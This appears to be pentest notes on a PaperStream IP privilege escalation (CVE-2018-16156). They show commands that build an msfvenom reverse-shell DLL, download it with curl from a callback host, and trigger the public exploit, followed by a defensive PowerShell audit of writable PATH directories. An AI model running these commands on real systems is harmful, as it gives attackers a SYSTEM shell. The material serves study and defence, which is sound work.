PaperStream IP

PaperStream IP is Fujitsu’s image processing software designed to optimize scanned documents for clarity, searchability, and storage. It operates as a background service that interfaces with TWAIN or ISIS drivers, providing cleanup, enhancement, and conversion of scanned images before they are delivered to applications.

Local Privilege Escalation

PaperStream IP (TWAIN) version 1.42.0.5685 is affected by a privilege escalation vulnerability (CVE-2018-16156) due to unsafe DLL loading in the FJTWSVIC service, which runs with SYSTEM privileges and processes unauthenticated messages over the FjtwMkic_Fjicube_32 named pipe. The vulnerable function attempts to load UninOldIS.dll and execute an exported function named ChangeUninstallString.

Since this DLL does not exist in the default installation, an attacker can place a malicious DLL with the same name in any directory referenced by the PATH environment variable, resulting in arbitrary code execution with SYSTEM-level privileges (PoC).

$ searchsploit PaperStream

PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation | windows/local/49382.ps1

# Default payload name in the PoC
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.241 LPORT=80 -f dll -o UninOldIS.dll
# Default location in the PoC
> curl http://192.168.45.241:443/UninOldIS.dll -o c:\Windows\Temp\UninOldIS.dll

> powershell 49382.ps1
Writable location found, copying payload to C:\JavaTemp\
Payload copied, triggering...

Payload triggered
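
A defensive check for the condition described above, added here as an example and not taken from the original page or the PoC: it walks the machine-level PATH, flags directories where low-privileged principals can create files, and reports any copy of UninOldIS.dll found there. The SID list and the write-bit mask are assumptions of this example; deny ACEs and custom groups are not evaluated.

```powershell
# Added audit example, not part of the original page or the vendor's tooling.
$dllName = 'UninOldIS.dll'   # DLL name given on the page
# Assumed low-privileged principals: Everyone, Authenticated Users, BUILTIN\Users, INTERACTIVE
$lowPriv = 'S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', 'S-1-5-4'
# WriteData/CreateFiles (0x2), GENERIC_WRITE (0x40000000), GENERIC_ALL (0x10000000)
$writeBits = 0x2 -bor 0x40000000 -bor 0x10000000

function Test-LowPrivWritable {
    param([string]$Directory)
    try   { $acl = Get-Acl -LiteralPath $Directory -ErrorAction Stop }
    catch { return $null }   # ACL not readable from this context
    $sidType = [System.Security.Principal.SecurityIdentifier]
    foreach ($ace in $acl.GetAccessRules($true, $true, $sidType)) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        # Inherit-only ACEs apply to children, not to the directory itself
        $inheritOnly = [System.Security.AccessControl.PropagationFlags]::InheritOnly
        if ($ace.PropagationFlags -band $inheritOnly) { continue }
        if ($lowPriv -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights) -band $writeBits) { return $true }
    }
    return $false
}

# A SYSTEM service resolves DLLs through the machine-level PATH
$machinePath = [Environment]::GetEnvironmentVariable('Path', 'Machine')
$findings = foreach ($entry in ($machinePath -split ';')) {
    $dir = [Environment]::ExpandEnvironmentVariables($entry.Trim().Trim('"'))
    if (-not $dir -or -not (Test-Path -LiteralPath $dir -PathType Container)) { continue }
    [pscustomobject]@{
        Directory       = $dir
        LowPrivWritable = Test-LowPrivWritable -Directory $dir
        DllPresent      = Test-Path -LiteralPath (Join-Path $dir $dllName) -PathType Leaf
    }
}

# Show only the entries that need attention
$findings | Where-Object { $_.LowPrivWritable -or $_.DllPresent } | Format-Table -AutoSize
```

Any row with DllPresent set deserves investigation, since the DLL is absent from a default installation. Directories flagged LowPrivWritable should be removed from PATH or have their ACLs tightened.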
